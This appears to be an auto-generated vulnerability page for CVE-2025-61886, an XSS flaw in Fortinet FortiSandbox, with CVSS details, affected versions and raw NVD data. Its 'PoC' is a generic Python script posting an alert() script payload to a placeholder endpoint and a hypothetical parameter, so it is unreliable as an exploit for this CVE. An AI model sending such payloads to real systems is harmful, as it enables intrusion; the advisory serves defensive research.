Security Vulnerability Report
CVE-2025-61886 CVSS 5.4 MEDIUM

Published: 2026-04-14 16:16:32
Last Modified: 2026-04-22 19:09:05

Description

An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] in Fortinet FortiSandbox 5.0.0 through 5.0.4 and FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.4:*:*:*:*:*:*:* - VULNERABLE
Fortinet FortiSandbox 5.0.0 - 5.0.4
Fortinet FortiSandbox PaaS 5.0.0 - 5.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (Example)
# Replace with the actual vulnerable endpoint
target_url = "http://target-fortisandbox/vulnerable_endpoint"

# Malicious XSS Payload
# This payload attempts to execute JavaScript to show an alert box
payload = '<script>alert("CVE-2025-61886 XSS Test")</script>'

# Headers to mimic a legitimate browser request
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Data to be sent in the request
# The parameter name 'vulnerable_param' is hypothetical and needs to be fuzzed or found in documentation
data = {
    "vulnerable_param": payload
}

try:
    # Sending the crafted HTTP request
    response = requests.post(target_url, data=data, headers=headers, timeout=10)

    # Check if the request was successful
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check the target application page or response to verify XSS execution.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")
```

References

https://fortiguard.fortinet.com/psirt/FG-IR-26-109 (Vendor Advisory)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-61886", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:31.800", "lastModified": "2026-04-22T19:09:04.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability [CWE-79] vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.4, FortiSandbox PaaS 5.0.0 through 5.0.4 may allow an attacker to perform an XSS attack via crafted HTTP requests."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.5", "matchCriteriaId": "EF408E96-79E8-452F-87E5-2E8CA083785E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortisandbox_cloud:5.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "E5E86B19-95E8-4107-85DC-EFE47225418C"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-109", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
```